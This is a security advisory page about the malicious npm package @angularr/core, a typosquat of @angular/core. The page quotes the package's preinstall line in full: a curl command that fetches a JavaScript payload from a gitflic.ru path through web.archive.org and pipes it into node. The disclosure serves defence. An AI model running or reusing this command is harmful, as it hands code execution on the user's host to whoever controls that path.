Logo
npm

@angularr/core@1.0.67

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC

Malicious

OSV ID

MAL-2026-17493

Ecosystem

npm

Summary

The package's npm preinstall lifecycle script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching a JavaScript payload from a third-party host and piping it directly to node for execution on every npm install. The destination (gitflic.ru under a user path hellscripter/install-scripts, routed via a web.archive.org proxy) is unrelated to any @angular publisher infrastructure, is unpinned, and is not integrity-checked. Whoever controls that path controls code execution on the installer's host. The package name @angularr/core is a one-letter variant of the widely-used @angular/core, increasing the likelihood of accidental installation.

Source: amazon-inspector (801dcd769bdbf58aa11a657a5344e075ed57fcdafd1384b47ba611956e7cb365)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.